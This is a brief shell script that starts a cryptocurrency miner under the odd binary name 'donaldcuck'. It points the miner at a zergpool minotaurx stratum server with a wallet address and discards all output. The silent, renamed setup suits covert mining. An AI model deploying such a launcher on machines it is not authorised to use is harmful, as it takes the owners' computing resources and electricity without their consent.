#!/bin/sh

CURR="AVN" 
PAYOUT="FLUX"
ID="CPUGOO"
USER="0x4df35E768976c2e4BdbE67Db522400805e499E5f"
PASS="c=$PAYOUT,mc=$CURR,ID=$ID"

./donaldcuck -a minotaurx -o stratum+tcp://minotaurx.na.mine.zergpool.com:7019  -u $USER -p $PASS &> /dev/null
